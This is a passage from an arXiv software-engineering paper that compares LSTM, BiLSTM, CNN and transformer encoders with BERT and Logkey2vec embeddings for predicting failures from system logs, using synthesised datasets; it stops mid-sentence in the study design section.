With the increasing complexity and scope of software systems, their dependability is crucial. The analysis of log data recorded during system execution can enable engineers to automatically predict failures at run time. Several Machine Learning (ML) techniques, including traditional ML and Deep Learning (DL), have been proposed to automate such tasks. However, current empirical studies are limited in terms of covering all main DL types -- Recurrent Neural Network (RNN), Convolutional Neural network (CNN), and transformer -- as well as examining them on a wide range of diverse datasets. In this paper, we aim to address these issues by systematically investigating the combination of log data embedding strategies and DL types for failure prediction. To that end, we propose a modular architecture to accommodate various configurations of embedding strategies and DL-based encoders. To further investigate how dataset characteristics such as dataset size and failure percentage affect model accuracy, we synthesised 360 datasets, with varying characteristics, for three distinct system behavioral models, based on a systematic and automated generation approach. Using the F1 score metric, our results show that the best overall performing configuration is a CNN-based encoder with Logkey2vec. Additionally, we provide specific dataset conditions, namely a dataset size >350 or a failure percentage >7.5%, under which this configuration demonstrates high accuracy for failure prediction.
Fatemeh Hadadi, Joshua H. Dawes, Donghwan Shin, Domenico Bianculli, Lionel Briand
2023-03-13T16:04:14Z
http://arxiv.org/abs/2303.07230v4
# Systematic Evaluation of Deep Learning Models for Failure Prediction + ###### Abstract With the increasing complexity and scope of software systems, their dependability is crucial. The analysis of log data recorded during system execution can enable engineers to automatically predict failures at run time. Several Machine Learning (ML) techniques, including traditional ML and Deep Learning (DL), have been proposed to automate such tasks. However, current empirical studies are limited in terms of covering all main DL types--Recurrent Neural Network (RNN), Convolutional Neural network (CNN), and transformer--as well as examining them on a wide range of diverse datasets. In this paper, we aim to address these issues by systematically investigating the combination of log data embedding strategies and DL types for failure prediction. To that end, we propose a modular architecture to accommodate various configurations of embedding strategies and DL-based encoders. To further investigate how dataset characteristics such as dataset size and failure percentage affect model accuracy, we synthesised 360 datasets, with varying characteristics, for three distinct system behavioral models, based on a systematic and automated generation approach. Using the F1 score metric, our results show that the best overall performing configuration is a CNN-based encoder with Logkey2vec. Additionally, we provide specific dataset conditions, namely a dataset size \(>350\) or a failure percentage \(>7.5\%\), under which this configuration demonstrates high accuracy for failure prediction. **Keywords:** Logs, Failure Prediction, Deep Learning, Embedding Strategy, Synthesised Data Generation, Systematic Evaluation Introduction As software systems continue to increase in complexity and scope, reliability and availability play a critical role in quality assurance and software maintenance [1, 32]. During runtime, software systems often record log data about their execution, designed to help engineers monitor the system's behavior [22]. One important quality assurance activity is to predict failures at run time based on log analysis, as early as possible before they occur, to enable corrective actions and minimise the risk of system disruptions [5]. However, software systems typically generate a vast quantity of log data which makes manual analysis error-prone and extremely time-consuming. Therefore, a number of automatic log analysis methods, particularly for failure prediction [13, 12, 46] and anomaly detection [18, 38, 60], have been proposed over the past few years. Machine Learning (ML) has played a key role in automatic log analysis, from Traditional ML methods (e.g., Random Forest (RF) [3], Support Vector Machine (SVM) [11], Gradient Boosting (GB) [6]) to Deep Learning (DL) methods (e.g., DeepLog [18], LogRobust [60], LogBERT [21]) relying on various DL network architectures, including Long Short-Term Memory (LSTM), Convolutional Neural Network (CNN), and transformers [32]. Although several studies have explored the use of DL models with various log sequence embedding strategies [22], they have been limited in terms of evaluating the three main types of DL networks--RNN, CNN, and transformer--combined with different embedding strategies; for instance, two studies by Le and Zhang [32] and Lu et al. [36] included CNN-based models but did not cover transformer-based models. Moreover, previously studied models were often applied to a limited number of available datasets, which severely limited the generalizability of results [22]. Indeed, because these few datasets exhibit a limited variety of characteristics, studying the robustness and generalizability of DL models, along with their embedding strategies, is unlikely to yield practical guidelines. In this paper, we aim to systematically investigate the combination of the main DL architectures and embedding strategies, based on datasets whose main characteristics (e.g., dataset size and failure percentage) are controlled. To achieve this, we first introduce a modular architecture for failure prediction, where alternative log embedding strategies and DL models can be easily applied. The architecture consists of two major steps: an embedding step that converts input logs into log embedding vectors followed by a classification step that predicts failures by processing the embedding vectors using encoders that are configured by different DL models, called DL encoders. In the embedding step, two alternative strategies, i.e., the pretrained BERT [15] and trainable Logkey2vec [36], are considered. In the classification step, four types of DL models, including LSTM [23], BiLSTM[48], CNN[42], and transformer [53], with an attention mechanism [53] for BiLSTM and transformer, are used. Also, to address the issue of the limited availability of adequate datasets, we designed a rigorous approach for generating synthesised data relying on behavioral models built by applying model inference algorithms [49, 54] to available system logs. When synthesizing data, we control key dataset characteristics such as the size of the dataset and the percentage of failures. Additionally, we define patterns that are associated with system failures and are used to classify logs for the failure prediction task. The goal is to associate failures with complex patterns that are challenging for failure prediction models. Further, based on our study, we investigated how the dataset characteristics determine the accuracy of model predictions and then derive practical guidelines. Our empirical results conclude that the best model includes the improved CNN-based encoder with Logkey2vec as an embedding strategy. Using a wide variety of datasets showed that this combination is also very accurate when certain conditions are met in terms of dataset size and failure percentage. To summarise, the main contributions of this paper are: * A large-scale, systematic investigation of the application of various DL encoders-LSTM-, BiLSTM-, CNN-, and transformer-based- and embedding strategies-BERT [15] and Logkey2vec [36]- for failure prediction modeling * A systematic and automated approach to synthesise log data, with a focus on experimentation in the area of failure prediction, to enable the control of key data set characteristics while avoiding any other form of bias. * Practical guidelines for using DL-based failure prediction models depending on dataset characteristics such as dataset size and failure rates. * A publicly available replication package, containing the implementation, generated datasets with behavioural models, and results. The rest of the paper is organised as follows. Section 2 presents the basic definitions and concepts that will be used throughout the paper. Section 3 illustrates related work. Section 4 describes the architecture of our failure predictor with its different configuration options. Section 5 describes our research questions, empirical methodology, and synthetic log data generation. Section 6 reports empirical results. Section 7 discusses the implications of the results. Section 8 concludes the paper and suggests future directions for research and improvements. ## 2 Background In this section, we provide background information on the main concepts and techniques that will be used throughout the paper. First, we briefly introduce the concepts related to finite state automata (FSA) and regular expressions in SS 2.1 and execution logs in SS 2.2. We then describe two important log analysis tasks (anomaly detection and failure prediction) in SS 2.3 and further review machine-learning (ML)-based approaches for performing such tasks in SS 2.4. We conclude by providing an overview of embedding strategies for log-based analyses in SS 2.5. ### Finite State Automata and Regular Expressions A _deterministic FSA_ is a tuple \(\mathcal{M}=\langle Q,A,q_{0},\Sigma,\delta\rangle\), where \(Q\) is a finite set of states, \(A\subseteq Q\) is the set of accepting states, \(q_{0}\in Q\) is the starting state, \(\Sigma\) is the alphabet of the automaton, and \(\delta\colon Q\times\Sigma\to Q\) is the transition function. The extended transition function \(\delta^{*}:Q\times\Sigma^{*}\to Q\), where \(\Sigma^{*}\) is the set of strings over \(\Sigma\), is defined as follows: 1. For every \(q\in Q,\delta^{*}(q,\epsilon)=q\), where \(\epsilon\) represents the empty string; 2. For every \(q\in Q\), every \(y\in\Sigma^{*}\), and every \(\sigma\in\Sigma\), \(\delta^{*}(q,y\sigma)=\delta(\delta^{*}(q,y),\sigma)\). Let \(x\in\Sigma^{*}\); the string \(x\) is accepted by \(\mathcal{M}\) if \(\delta^{*}(q_{0},x)\in A\) and is rejected by \(\mathcal{M}\), otherwise. The language accepted by an FSA \(\mathcal{M}\) is denoted by \(\mathcal{L}(\mathcal{M})\) and is defined as the set of strings that are accepted by \(\mathcal{M}\); more formally, \(\mathcal{L}(\mathcal{M})=\{w\mid\delta^{*}(q_{0},w)\in A\}\). A language accepted by an FSA is called a _regular_ language. Regular languages can also be defined using _regular expressions_; given a regular expression \(r\) we denote by \(\mathcal{L}(r)\) the language it represents. A regular expression \(r\) over an alphabet \(\Sigma\) is a string containing symbols from \(\Sigma\) and special meta-symbols like "\(|\)" (union or alternation), "." (concatenation), and "*" (Kleene closure or star), defined recursively using the following rules: 1. \(\emptyset\) is a regular expression denoting the empty language \(\mathcal{L}(\emptyset)=\emptyset\); 2. For every \(a\in\Sigma\), \(a\) is a regular expression corresponding to the language \(\mathcal{L}(a)=\{a\}\); 3. If \(s\) and \(t\) are regular expressions, then \(r=s|t\) and \(r=s.t\) (or \(r=st\)) are regular expressions denoting, respectively, the union and the concatenation of \(\mathcal{L}(s)\) and \(\mathcal{L}(t)\); 4. If \(s\) is a regular expression, then \(r=s^{*}\) is a regular expression denoting the Kleene closure of \(\mathcal{L}(s)\). ### Logs In general, a _log_ is a sequence of log messages generated by logging statements (e.g., printf(), logger.info()) in the source code [22]. A _log message_ is textual data composed of a _header_ and _content_[22]. In practice, the logging framework determines the _header_ (e.g., INFO) while the _content_ is designed by developers and is composed of static and dynamic parts. The static parts are the fixed text written by the developers in the logging statement (e.g., to describe a system event), while the dynamic parts are determined by expressions (involving program variables) evaluated at runtime. For instance, let us consider the execution of the log printing statement logger.info(''Received block_"+ block_ID); during the execution, assuming variable block_ID is equal to 2, the log message Received block 2 is printed. In this case, Received block_ is the static part while 2 is the dynamic part, which changes depending on the value of block_ID at run time. A _log template_ (also called _event template_ or _log key_) is an abstraction of the log message content, in which dynamic parts are masked with a special symbol (e.g., *); for example, the log template corresponding to the above log message is Received block_*. Often, each unique log template is identified by an ID number for faster analysis and efficient data storage. A _log sequence_ is a fragment of a log, i.e., a sequence of log messages contained in a log; in some cases, it is convenient to abstract log sequences by replacing the log messages with their log templates. Log sequences are obtained by partitioning logs based on either log message identifiers (e.g., session IDs) or log timestamps (e.g., by extracting consecutive log messages using a fixed/sliding window). For a log sequence \(l\), \(|l|\) indicates the length of the log sequence, i.e., the number of elements (either log templates or log messages), not necessarily unique, inside the sequence. Figure 1 shows an example summarizing the aforementioned concepts. On the left side, the first three log messages are partitioned (using a fixed window of size three) to create a log sequence. The first message in the log sequence (_LogMessage1_) is 0142 info: sent block 4 in 12.2.1. It is decomposed into the header 0142 info and the content sent block 4 in 12.2.1. The log template for the content is sent block * in *; the dynamic parts are 4 and 12.2.1. ### Log Analysis Tasks In the area of log analysis, several major tasks for reliability engineering such as anomaly detection and failure prediction have been automated [22]. #### 2.3.1 Anomaly Detection Anomaly detection is the task of identifying anomalous patterns in log data that do not conform to expected system behaviors [22], indicating possible errors, faults, or failures in software systems. To automate the task of anomaly Figure 1: An example illustrating the concepts of log, log message, log template, and log sequence detection, log data is often partitioned into smaller log sequences. This partitioning is typically based on log identifiers (e.g., _session_ID_ or _block_ID_), which correlate log messages within a series of operations; alternatively, when log identifiers are not available, timestamp-based fixed/sliding windows are also used. Labeling of partitions is then required, each partition usually being labeled as an anomaly either when an error, unknown, or failure message appears in it or when the corresponding log identifier is marked as anomalous. Otherwise, it is labeled as normal. #### 2.3.2 Failure Prediction Failure prediction attempts to proactively generate early alerts to prevent failures, which often lead to unrecoverable outages [22]. Similar to anomaly detection, log data is often partitioned into sequences using log identifiers. Partitioned log sequences are labeled as failures according to mechanisms that are specific to the application being monitored. Like for anomalies, failures can be associated with complex patterns in log sequences. ### DL Techniques in Log Analysis In recent years, a variety of deep learning (DL) techniques have been applied to log analysis, and more specifically to failure prediction and anomaly detection. Compared to traditional ML techniques such as Random Forests (RF) and K-nearest Neighbours (KNN), DL techniques incrementally learn high-level features from data, removing complex feature extraction activities based on domain expertise. According to Le and Zhang [32], there are three main categories of DL approaches in log analysis: (1) Recurrent Neural network (RNN), (2) Convolutional Neural Network (CNN), and (3) transformer. In each category, different variations can be adopted; for instance, Long Short-Term Memory networks (LSTM) and Bidirectional Long Short-Term Memory networks (BiLSTM), which fall into the RNN category, have been repeatedly used for anomaly detection and failure prediction [18, 12, 60]. We now explain the major features of each category as well as their variations. #### 2.4.1 Rnn LSTM [24, 19] is an RNN-based model commonly used in both anomaly detection and failure prediction [18, 12]. An LSTM network consists of multiple units, each of which is composed of a cell, an input gate, an output gate [24], and a forget gate [19]. An LSTM-based model reads an input sequence \((x_{1},\ldots,x_{n})\) and produces a corresponding sequence \((y_{1},\ldots,y_{n})\) with the same length. At each time step \(t>1\), an LSTM unit reads the input \(x_{t}\) as well as the previous hidden state \(h_{t-1}\) and the previous memory \(c_{t-1}\) to compute the hidden state \(h_{t}\). The hidden state is employed to produce an output at each step. The memory cell \(c_{t}\) is updated at each time step \(t\) by partially forgetting old, irrelevant information and accepting new input information. The forget gate \(f_{t}\) is employed to control the amount of information to be removed from the previous context (i.e., \(c_{t-1}\)) in the memory cell \(c_{t}\). As a recurrent network, an LSTM shares the same parameters across all steps, which reduces the total number of parameters to learn. Learning is achieved by minimizing the error between the actual output and the predicted output. Moreover, to improve the regularization of an LSTM-based model, a dropout layer is applied between LSTM layers. It randomly drops some connections between memory cells by masking their value. LSTM-based models have shown significant performance in several studies in log-based failure prediction and anomaly detection [38, 39, 13, 12]. BiLSTM is an extension of the traditional LSTM [26]. However, BiLSTM reads the sequence in both directions, enabling it to comprehend the relationships between the previous and the upcoming inputs. To make this possible, a BiLSTM network is composed of two layers of LSTM nodes, whereby each of these layers learns from the input sequence in the opposite direction. At time step \(t\), the output \(h_{t}\) is calculated by concatenating \(h_{t}^{f}\) (the hidden states in a forward pass) and \(h_{t}^{b}\) (the hidden states in a backward pass). By allowing this bi-directional computation, BiLSTM is able to capture complex dependencies and produce more accurate predictions. The BiLSTM-based model has achieved accurate results for anomaly detection [60]. #### 2.4.2 Cnn CNN is a neural network primarily employed for image recognition [42]. It has a unique architecture designed to handle 2D and 3D input data such as images and matrices. A CNN leverages convolutional layers to perform feature extraction and pooling layers to downsample the input. The 1D convolutional layer uses a set of filters to perform convolution operation with the 2D input data to produce a set of feature maps (CNN layer output). According to Kim [29], let \(w\in R^{k\times d}\) be a filter which is applied to a window of \(k\) elements in a \(d\)-dimension input log sequence, and let \(x_{i}\) represent the \(i\)-th elements in the sequence. A feature \(c_{i}\in R\) is calculated as \(c_{i}=\sigma(w.x_{i:i+k-1}+b)\), where \(\sigma\) is the activation function (i.e., \(ReLu\)), \(x_{i:i+k-1}\) represents the concatenation of elements \(\{x_{i},x_{i+1},...,x_{i+k-1}\}\), and \(b\in R\) denotes a bias term. After this filter is applied to each window in the sequence (\(\{x_{1:k},x_{2:k},...,x_{n-k+1:n}\}\)), a feature map \(c=[c_{1},c_{3},...,c_{n-k+1}]\) is produced, where \(c\in R^{n-k+1}\). Parameter \(k\) represents the kernel size; it is as an important parameter of the operation. Note that there is no padding added to the input sequence, leading to feature maps smaller than the input sequence. Padding is a technique employed to add zeros to the beginning and/or end of the sequence; it allows for more space for the filter to cover, controlling the size of output feature maps. Padding is commonly used so that the output feature map has the same length as the input sequence [10]. The pooling layer reduces the spatial dimensions of the feature maps extracted by the convolutional layer and simplifies the computational complexity of the network. Recently, CNNs have shown high-accuracy performance in anomaly detection [36]. #### 2.4.3 Transformer The transformer is a type of neural network architecture designed for natural language processing tasks, introduced by Vaswani et al. [53]. The main innovation of transformers is the self-attention mechanism. More important parts of the input receive higher attention, which facilitates learning the contextual relationships from input data. This is implemented by calculating a weight for each input element, which represents the importance of that element with respect to the adjacent elements. Hence, a model with self-attention (not necessarily a transformer) can capture long-range dependencies in the input. Since the transformers do not process inputs sequentially like LSTM, positional encoding is needed. Positional encoding vectors are fixed-size, added to the input to provide information about the position of each element in the input sequence. Further, a transformer involves a stack of multiple transformer blocks. Each block contains a self-attention layer and a feed-forward neural network layer. In the self-attention layer, the model computes attention scores (weights) for each element, allowing it to capture the relationship between all input elements. The feed-forward layer is used to transform the representation learned by the self-attention layer into a new representation entering the next transformer block. In the area of log analysis, transformers have been recently applied in a few studies on anomaly detection [31, 25, 21, 41], showing outstanding performance. ### Log Sequence Embedding Strategies When analyzing log sequences, the textual data of log sequences' elements must be converted into a vector representation that is understandable by a machine; such a conversion is called the _log sequence embedding_. Generally, there are two main approaches for doing this: 1) based on count vectors [14] or ID numbers of the sequence elements, or 2) based on the contextual information of sequence elements. Here, we cover one widely used example for each case in the following sections. #### 2.5.1 Logkey2vec There are many studies that have achieved high accuracy results by using log embedding strategies that rely on the ID numbers or count vectors of log sequence elements [58]. Advantages include the speed of processing and model simplicity since text preprocessing (e.g., tokenization) is not required. Similar to methods like word2vec [40], which assigns a unique vector to each different word based on a context mapping table, Logkey2vec maps each unique log template ID to a vector representation. While Word2vec is a pre-trained tool, Logkey2vec is a trainable layer implemented inside a neural network. It relies on a matrix called "codebook", where the number of rows is the vocabulary size and the number of columns is the embedding vector size of each log template ID. The embedding vectors are first initialised by random numbers and are improved through backpropagation during training. For a log sequence, Logkey2vec computes the embedding vector of each log template based on its log template ID; each row of the matrix represents the whole log sequence. #### 2.5.2 Bert In the past few years, Bidirectional Encoder Representations from Transformers (BERT) has provided significant improvements in the semantic embedding of textual information by taking the contextual information of text into account. It has been used in a few studies in log-based anomaly detection [21, 31]. This model fares better than the other pretrained transformer-based models: GPT2 [45] and RoBERTa [35] in log sequence embedding [31]. The pre-trained BERT base model [15] provides the embedding matrix of log sequences where each row is the representation vector of its corresponding log template inside the sequence. The BERT model is applied to each log template separately and then the representation is aggregated inside a matrix. To embed the information of a log template into a 768-sized vector, the BERT model first tokenizes the log template text. BERT tokenizer uses WordPiece [56], which is able to handle out-of-vocabulary (OOV) words to reduce the vocabulary size. Further, the tokens are fed to the 12 layers of BERT's transformer encoder. After obtaining the output vectors of a log template's tokens, the log template embedding is calculated by getting the average of output vectors. This process is repeated for all the log templates inside the log sequence to create an \(n\times 768\) matrix representation where \(n\) is the size of the log sequence. ## 3 Related Work There are several papers reporting empirical studies of different DL-based methods for log-based anomaly detection and failure prediction. In our review, we include studies that covered more than one DL model, possibly based on the same DL type; given our focus, non-DL models such as RF, SVM, and clustering are not included. The main studies are summarised in Table 1. Column "DL Type(s)" indicates the type of DL network covered in each paper. We indicate the Log Sequence Embedding (LSE) strategies, introduced in SS 2.5, in the next column; notice there are a few models not using LSE, such as DeepLog [18]. Column "Dataset(s)" indicates which datasets (whether existing datasets or synthesised ones) were used in the studies. Column "DataSet Char Control" indicates whether the dataset characteristics were controlled during the experiment and lists such characteristics. In the last column, the labeling scheme indicates the applied method(s) for log partitioning, as mentioned in SS 2.2, based on either a log identifier or timestamp (represented by \(L\) and \(T\), respectively). \begin{table} \begin{tabular}{l c c c c c} \hline \hline **Paper** & **DL Type(s)** & **LSE Strategi(es)** & **Dataset(s)** & **DataSet Char Con- Scheme** \\ \hline Lu et al. [36] & LSTM, CNN, MLP & Logkey2vec & HDFS & No & \\ & & CNN, MLP & & & L \\ \hline Meng & LSTM & Template2Vec HDFS, BGL & No & & \\ & et al. [38] & & & & T, L \\ \hline Das et al. & LSTM & - & Clay-HPC & No & \\ [13] & & & & & L \\ \hline Huang & LSTM, & TF-IDF- & HDFS, BGL, & Yes & \\ & et al. [25] & BiLSTM, & based, Log & OpenStack & (unstable log & T, L \\ & Transformer & Encoder & & injection & \\ & & & & ratio) & \\ \hline Yang & LSTM, & Template2Vec,HDFS, BGL & No & \\ & et al. [59] & BiLSTM, & TF-IDF & & & T, L \\ & GRU & & & & \\ \hline Guo et al. & LSTM, & Template2Vec,HDFS, BGL, & No & \\ [21] & Transformer & Embedding Thunderbird & & & T, L \\ & & Matrix & & & \\ \hline Le and & LSTM, & Log2Vec*, & HDFS, & No & \\ Zhang & BiLSTM, & TF-IDF, & BGL, Spirit, & & T, L \\ [31] & Transformer & BERT & Thunderbird & & \\ \hline Le and & LSTM, & Template2Vec, & HDFS, & Yes (class & \\ Zhang & BiLSTM, & Logkey2vec, & BGL, Spirit, & distribution, & \\ [32] & GRU, CNN & TF-IDF & Thunderbird & data noise, & \\ & & & & partitioning & \\ & & & & methods) & \\ \hline Our & LSTM, & BERT, & Synthesized & Yes (Dataset & \\ Study** & BiLSTM, & Logkey2vec & Data & size, Failure & \\ & CNN, & & & Percentage, & \\ & Transformer & & & LSL, Failure & \\ & & & & Pattern & \\ & & & & type) & \\ \hline \hline \end{tabular} *: we highlight that Log2Vec is different than Logkey2vec, a log sequence embedding strategy (see § 2.5.1) *: further discussed in § 7 \end{table} Table 1: Overview of Related Empirical Studies We now briefly explain the papers with the aim to motivate our study and highlight the differences. We note that, unless we mention it, LSE strategies are implemented specifically for one DL model (combinations are not explored). Indeed, many of the reported techniques tend to investigate one such combination or simply do not rely on any embeddign strategy. The studies are listed in chronological order. Lu et al. [36] (2018) introduced CNN for anomaly detection as well as the Logkey2vec embedding strategy (see SS 2.5.1). They compared it to LSTM and MLP networks, also relying on the Logkey2vec embedding strategy. Meng et al. [38] (2019) developed LogAnomaly, an LSTM-based model, using their proposed embedding strategy, Template2Vec (a log-specific variant of Word2Vec). Das et al. [13] (2020) introduced a state-of-the-art LSTM-based model, Aarohi, for predicting failures using log data and compared it to two LSTM-based models Dash [12] and DeepLog [18] with the aim of online prediction efficiency. None of these technqiues rely on a log embeddign strategy. The first study considering transformers in their DL comparison is by Huang et al. [25] (2020), featuring three DL models: HitAnomaly (transformer-based), LogRobust [60] (BiLSTM-based), and DeepLog (LSTM-based). HitAnomaly utilises transformer blocks (see SS 2.4.3) as part of its LSE strategy, called Log Encoder. LogRobust employed TF-IDF technique [28] while DeepLog did not utilise any LSE strategy. The authors also controlled dataset characteristics by manipulating the unstable log ratios. Yang et al. [59] (2021) proposed the GRU-based [9] PLELog and compared it to LogRobust and DeepLog. PLELog used the TF-IDF technique, similar to LogRobust. Guo et al. [21] (2021) proposed a transformer-based model, LogBERT, and compared its performance with two LSTM-based models, LogAnomaly and DeepLog. LogBERT uses an Embedding Matrix for its embedding strategy, which is similar to Logkey2vec. Le and Zhang [31] (2022) evaluated their proposed transformer-based model, Neurallog, against LogRobust (BiLSTM-base) and DeepLog (LSTM-based). The LSE strategies for the models were a pre-trained BERT (see SS 2.5.2) for Neurallog and Log2Vec [39] for DeepLog. Finally, Le and Zhang [32] (2022) conducted a comprehensive evaluation of several DL models including LSTM-based models such as DeepLog and LogAnomaly, GRU-based model PLELog, BiLSTM-based model LogRobust, and CNN. The study focused on various aspects including data selection, data partitioning, class distribution, data noise, and early detection ability. Datasets.Due to security concerns, in many of the works in the literature, the data sources are unavailable such as Clay-HPC (Clay high-performance computing (HPC) systems). Studies that used available datasets are limited to the following: Hadoop Distributed File System (HDFS) collected in 2009, and three HPC datasets, BGL, Spirit, and Thunderbird, collected between 2004 and 2006. Besides, there is the OpenStack dataset (2017) created by injecting a limited number of anomalies at different execution points which not only does limit the diversity of anomalies, it may not accurately reflect real-world scenarios. Motivating this work.Although the above studies used various DL models (13 models), none of them covers all the main DL types, RNN, CNN, and transformer. Moreover, the LSE strategies are rarely evaluated across all the DL networks, keeping them inside which original model they were proposed. Furthermore, the investigation of various combinations of LSE strategies and DL types has been limited in existing studies; many popular models tend to adopt a fixed combination of these two elements. From table 1 we can also see that recent studies are incomplete evaluations of DL models with a limited number of datasets that are not recent. These remarks highlight the need for a systematic and comprehensive study that 1) explores various DL types as well as their combinations with different LSE strategies; and 2) examines how various dataset characteristics affect performance. ## 4 Failure Prediction Architecture To systematically evaluate various deep learning models for failure prediction, we rely on a generic architecture that can use different modules with respect to the embedding strategy and the DL encoder. This modular architecture will allow us to easily change individual modules corresponding to the various DL techniques and log sequence embedding strategies. Figure 2 depicts the modular architecture. The architecture consists of two main steps, _embedding_ and _classification_, designed to adopt different embedding as well as DL techniques, respectively. We note that preprocessing is not required in this architecture since log sequences are based on log templates which are already preprocessed from log messages. In the embedding step, log sequences are given as input, and each log sequence is in the form \((x_{1},x_{2},...,x_{i},..,x_{n})\), where \(x_{i}\) is a log template ID and \(n\) is the length of the log sequence. An embedding technique (e.g., BERT) converts each \(x_{i}\) to a \(\theta\)-dimensional vector representing the semantics of \(x_{i}\), where \(\theta\) is the size of log sequence embedding. Then each log sequence forms a matrix \(X\in R^{n\times\theta}\). Different log sequence embedding strategies can be applied; more information is provided in SS 4.1. In the classification step, the embedding matrix is processed to predict whether the given log sequence is failure or not. A DL model, as an encoder \(\Phi\) encodes the matrix \(X\) into a feature vector \(z=\Phi(X)\in R^{m}\), where \(m\) is the number of features, which is a variable depending on the architecture of \(\Phi\). Different DL encoders can be applied; more information is provided in SS 4.2. Similar to related studies [25, 36], the output feature vector \(z\) is then fed to a feed-forward network (FFN) and softmax classifier to create a vector of size \(d\) (\(d=2\)), indicating the prediction of the input unit label. More specifically, the FFN activation function is rectified linear unit (ReLu), and the output vector of the FNN \(r\) is defined as \(r=max(0,zW_{1}+b_{1})\) where \(W_{1}\in R^{m\times d_{f}}\) and \(b_{1}\in R^{d_{f}}\) are a trainable parameter, and \(d_{f}\) is the dimensionality of FNN. Further, the calculation of the softmax classifier is as follows. \[o=rW_{2}+b_{2} \tag{1}\] \[\textit{softmax}(o_{p})=\frac{exp(o_{p})}{\sum_{j}exp(o_{j})} \tag{2}\] where \(W_{2}\in R^{d_{f}\times d}\) and \(b_{2}\in R^{d}\) are trainable parameters to convert \(r\) to \(t\in R^{d}\) before applying softmax; \(o_{p}\) represents the \(p\)-th component in the \(o\) vector, and \(exp\) is the exponential function. After obtaining the softmax values, the position with the highest value determines the label of the input log sequence. Overall, the combination of an embedding strategy and a DL encoder forms a language model that takes textual data as input and transforms it into a probability distribution [53]. This language model handles the log templates as well as learning the language of failure patterns to predict the label of sequences. To train the above architecture, a number of hyper-parameters should be set such as the choice of the optimizer, loss function, learning rate, input size (for some deep learning models), batch size, and the number of epochs. Tuning these hyper-parameters is highly suggested as it increases the chances of achieving the best failure prediction accuracy. Section 5.2.3 will detail the training and hyper-parameter tuning in our experiments. After the model is trained, it is evaluated with a test log split from the dataset with stratified sampling. We used stratified sampling to keep the same Figure 2: The overview of modular architecture distribution of failure log sequences as the original dataset. Similar to training data, the embedding step transforms the test log sequences into embedding matrices. The matrices are then fed to the trained DL encoder to predict whether log sequences are normal or not. ### Embedding Strategies. While the modular architecture can accommodate various log sequence embedding options, we only selected two in order to limit the number of possible models resulting from the architecture, given our experimental constraints1. Our selection criteria aimed to include both trainable and pretrained options, as well as an advanced strategy based on transformers. Hence, given the description provided in SS 3, the "Embedding step" of our base architecture is instantiated using two strategies: BERT or Logkey2vec. The BERT sequence embedding technique is pretrained and was recently adopted for log sequences [31] while Logkey2vec is trainable and was proposed earlier [36]. Note that these two techniques were not compared in the same study before, according to Table 1. Footnote 1: More details are provided in § 5.2.1 Bert.The maximum number of input tokens for BERT (see SS 2.5.2) is 512 tokens. This limit does not constitute a problem in this work since the log templates in our datasets are relatively short and the total number of tokens in each log template is always less than 512. Even if log templates were longer than 512, there are related studies suggesting approaches to use BERT accordingly [55, 17, 50]. Each layer of the transformer encoder contains multi-head attention sub-layers and FFNs to compute a context-aware embedding vector (\(\theta=768\)) for each token. This process is repeated for all the log templates inside the log sequence to create a matrix representation of size \(n\times 768\), where \(n\) is the length of the input log sequence. Logkey2vec.For Logkey2vec (see SS 2.5.1), we set the embedding size to 768, similar to BERT for better comparison. The vocabulary size is a parameter of Logkey2vec that is going to be set during the experiments. ### Deep Learning Encoder In this section, we illustrate the main features of the four DL encoders that can be used in the "Classification step" when instantiating our base architecture. We selected four encoders (LSTM-, BiLSTM-, CNN-, and transformer-based) because they cover the main DL types in addition to the recently emerged mechanism of attention, as mentioned in SS 3. LSTM-based.This DL model is inspired by the LSTM architecture suggested by related works, including DeepLog [18], Aarohi [13], and Dash [12]. The model has one hidden layer of LSTM with 128 nodes and ReLu activation. A Dropout with a rate of \(0.1\) is applied to make the model generalise better. The output of the model is a feature vector of size \(128\). BiLSTM-based.The model has an architecture similar to LogRobust, which was proposed for anomaly detection. Due to its RNN-based architecture, its output is a feature vector with the same size as the input log sequence length [60]. CNN-based.The CNN architecture is a variation of the convolutional design for the CNN-based anomaly detection mode [36]. Based on our preliminary experimental results, \(20\) filters, instead of one, for each of the three 1D convolutions (see SS 2.4.2) are used in parallel to capture relationships between log templates at different distances. To ensure that feature maps of each convolution have the same dimension as the input, the padding technique is used. Hence, the length of the output feature vector is the product of the number of filters (20), the number of convolutions (3), and the input size of the log sequence. Transformer-based.Our architecture of the transformer model is inspired by recent work in anomaly detection [31, 25, 41]. The model is composed of two main parts: positional embedding and transformer blocks. One transformer block is adopted after positional embedding, set similarly to a recent study [31]. After global average pooling, the output matrix is mapped into one feature vector the same size as the log template embedding \(\theta=768\), previously explained in SS 2.4. ## 5 Empirical Study Design ### Research Questions The goal of this study is to systematically evaluate the performance of failure predictors, by instantiating our base architecture with different combinations of DL encoders and log sequence embedding strategies, for various datasets with different characteristics. The ultimate goal is to rely on such analyses _to introduce practical guidelines to select the right failure prediction model based on the characteristics of a given dataset_. To achieve this, we investigate the following research questions: **RQ1:**: What is the impact of different DL encoders on failure prediction accuracy? **RQ2:**: What is the impact of different log sequence embedding strategies on failure prediction accuracy? **RQ3:**: What is the impact of different dataset characteristics on failure prediction accuracy? RQ1 and RQ2 investigate how failure prediction accuracy varies across DL encoders and embedding strategies reported in the literature. Most of them have been evaluated in isolation or with respect to a few alternatives, often using ad-hoc benchmarks (see SS 3 for a detailed comparison). To address this, we comprehensively consider all variations of our base architecture, obtained by combining four DN encoders (LSTM, CNN, transformer, and BiLSTM) with two log sequence embedding strategies (Logkey2vec and BERT) that have been widely used in failure prediction and anomaly detection. Furthermore, we systematically vary the characteristics of the input datasets in terms of the number of log sequences, the length of log sequences, and the proportion of normal log sequences. The answer to these questions is expected to lead to practical guidelines for choosing the best failure prediction model given a dataset with certain characteristics. RQ3 additionally investigates the impact of the input dataset characteristics on failure prediction accuracy with a focus on the best DL encoder and log sequence embedding strategy found in RQ1 and RQ2. The answer to this question will help us better understand under which conditions the combination of the best DL encoder and log sequence embedding strategy works sufficiently well for practical use, possibly leading to practical guidelines to best prepare input datasets for increasing failure prediction accuracy. ### Methodology As discussed in SS 4, we can instantiate the base architecture for failure prediction with different DL encoders and log sequence embedding strategies. To answer RQ1 and RQ2, we train different configurations of the base architecture while systematically varying training datasets' characteristics (e.g., size and failure types). Then, we evaluate the relative performance of the configurations in terms of failure prediction accuracy, using test datasets having the same characteristics but not used during training. To answer RQ3, we analyze the results of the best configuration (i.e., the best DL encoder and log sequence embedding strategy) identified in RQ1 and RQ2. Specifically, we build regression trees [4] to automatically infer conditions describing how the failure prediction accuracy of the best configuration varies according to the dataset characteristics. #### 5.2.1 Log Sequence Embedding Strategies and DL Encoders As for different log sequence embedding strategies, we consider Logkey2vec and BERT, which have shown to be 